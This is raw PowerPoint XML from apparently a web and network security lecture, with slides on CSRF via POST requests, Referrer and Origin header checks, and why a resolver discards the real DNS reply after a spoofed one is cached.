                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacks,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>different?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3419856"/>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DFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="3683287"/>
            <a:ext cx="979593" cy="803509"/>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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="513"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 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4731" y="450638"/>
            <a:ext cx="7084907" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-33" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1608327"/>
            <a:ext cx="10224345" cy="833519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="3387" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:lnSpc>
                <a:spcPct val="103499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="27"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-1007" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>outlined</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>earlier.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>In</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacks,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>different?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="3419856"/>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DFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="3683287"/>
            <a:ext cx="979593" cy="803509"/>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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="513"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 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 Spoofing (6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556182" y="1028143"/>
            <a:ext cx="11368726" cy="5106513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. What happens when the real DNS reply shows up?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>If Trudy’s spoofing attack succeeds, the real DNS response is no longer relevant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Why the Real Reply is Discarded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNS resolvers maintain a list of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>outstanding queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> they are waiting to resolve.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Once a query is answered (e.g., by Trudy’s fake response), it is removed from this list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>When the legitimate response arrives:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The resolver checks for an outstanding query ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Finding none, it discards the real reply.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resolver caches Trudy’s fake response, meaning all future queries for the domain will return the attacker’s malicious IP</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
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D35D5A2-1A62-F446-55FC-25C3D8B99A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819455" y="5710019"/>
            <a:ext cx="6094428" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18217300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965447" y="450638"/>
            <a:ext cx="4257887" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1610360"/>
            <a:ext cx="10607040" cy="1987916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-458035">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Instead</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sending</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whole</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>referring</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URL,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-940" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>leak</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>information,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>referring </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scheme,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>host,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>port.</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
